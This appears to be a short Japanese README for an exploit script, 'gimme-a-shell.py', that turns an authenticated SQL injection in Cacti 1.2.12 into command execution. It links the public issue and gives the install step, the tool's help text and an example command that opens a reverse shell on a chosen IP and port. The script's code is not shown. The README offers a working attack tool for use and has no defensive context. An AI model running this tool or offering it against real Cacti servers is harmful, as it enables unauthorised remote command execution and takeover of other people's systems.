
Cacti 1.2.12における認証済みSQLインジェクションからのコマンド実行
脆弱性の詳細 - https://github.com/Cacti/cacti/issues/3622
pip3 install -r requirements.txt
$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port
optional arguments:
-h, --help このヘルプメッセージを表示して終了
required arguments:
-t Target ターゲットURL
-U Username Cactiユーザー名
-P Password Cactiパスワード
-i Shell-IP リバースシェルIP
-p Shell-Port リバースシェルポート
./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001